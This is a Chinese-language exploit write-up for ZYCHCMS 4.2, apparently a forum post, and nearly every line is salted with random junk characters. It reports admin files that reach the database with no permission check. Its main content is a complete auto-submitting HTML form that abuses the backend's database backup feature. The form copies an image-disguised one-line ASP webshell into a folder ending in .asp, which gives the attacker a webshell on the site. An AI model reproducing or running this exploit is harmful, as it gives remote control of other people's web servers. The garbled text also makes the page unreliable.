& u6 b. v, U7 _ m& {
4 g* f3 t1 M% p2 n
( N4 z9 y: K/ c/ M: E' u2 l
C7 V S, H2 F8 m3 _( U, {影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
1 U8 x) `' u5 v% S5 f) w/ G! A ①SQL注射漏洞9 |$ r1 |# [+ R4 b; i8 V2 V
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp" \: I8 S+ J" V6 U. l
漏洞原因:未过滤
8 u# W% R; P; N0 { 漏洞代码:
6 o% p7 H' J1 f1 J8 H: X 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
( X% E! s. @% I7 x& j+ E 修复方法:在文件开头加入代码. N3 z$ h' O) o' r+ M! {; D/ e' f
4 c* F; [6 I( ^3 B$ @9 e" c$ |% d ]
②后台拿WBSHELL
, F+ w0 c. J- c6 R6 O 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
- m# n7 Y2 L& S$ i, @ 这里在网上找了一个,改了下,将就着用。+ X- x$ `3 T, b6 S5 i8 {9 }9 A6 X
以下是代码本地提交代码9 [: Z" {9 I/ \' ?; {2 g7 y
5 S; N9 c6 |" S% l/ \
+ L5 [7 s5 D$ y6 I P+ {5 a<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
0 H! X2 t, T$ }+ }5 F. t <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>) t/ u, |7 u' j( K2 g
<tr>7 K. }) n; w3 }0 ?6 M a
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
; r) H( D6 Z1 p& X% D5 W, B </tr>
: }0 t' t# E$ {7 m( b <tr>
5 k) N4 h$ B N* f <td bgcolor=”#FFFFFF”><span class=”back_southidc”>
( x: p3 b, h! r </span>
3 t# C4 v* p, F <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >4 K$ Z: R. b) I6 A
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >7 w/ _. Q$ i1 p$ U" |1 X
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
' C" @8 n, E! D# v- A0 u1 ?1 E <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
9 l0 m0 G) g0 M3 H) [9 u# L <div align=”left”>) x: l& [& O% I
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />1 T7 z5 l3 t4 p; ]1 b
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>( W/ a3 K N8 J
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
( v% S2 }7 `; _0 O L+ i </div></td>
0 i# M/ l' t4 i4 w& F/ f- }: T </tr>7 q) M3 p0 I# O. o
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>+ d$ g( e. H$ X' v9 ]; A$ R1 P5 I
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>4 \8 K, f. K" N
<td class=”td”><div align=”left”>' j: R, T' Y& V. G1 r9 y2 V* C
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />2 X8 b. X- V* P; o5 R/ P) W
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
5 g& p) `! S; O4 v4 k: v" P </tr>* Z0 o7 \9 T! }) W% }
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
4 A! g4 S( U$ | <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>" |1 P9 R* y) R+ e c
<td class=”td”><div align=”left”>2 z- a$ ^& K3 ^( n. Q
<input type=”submit” value=”确定备份” class=”btn”% ]" F6 F) V) t) Y* R# _' V
</div></td>, H. p- I" f, ]; ]+ O
</tr>* L/ F% M e6 I1 K
</table></td></tr></form>& q& k! ~5 p6 R8 t/ z
</table>
! A7 G$ w' ~; n. B: t </td>9 ~. f8 ^2 A& y8 W
</tr>& O/ R- M- W( f( T
</table>
& a$ s$ ^- R" x. ]4 e* a" } <script>
5 l! N* [! F4 X( \ document.all.add.submit();: ^2 }4 s8 f" A7 m4 [" S. s
</script>
. Q. F+ z: p Y0 \ c
8 _+ k! e' @* \" i; ~
! A5 n4 s) y: Q9 p/ u( {8 a2 {0 `; B" d+ Z7 D
' L# p2 z, }8 U5 S
# ^* r5 l5 |7 V' m7 a# Y- {
& A) D d$ d2 r6 M
0 a2 I" J9 k: V* e: |2 v. \
1 G/ @1 e, ?# q
: ? }5 Y- `7 h2 l# s0 n; P( a7 @4 z, J. |
|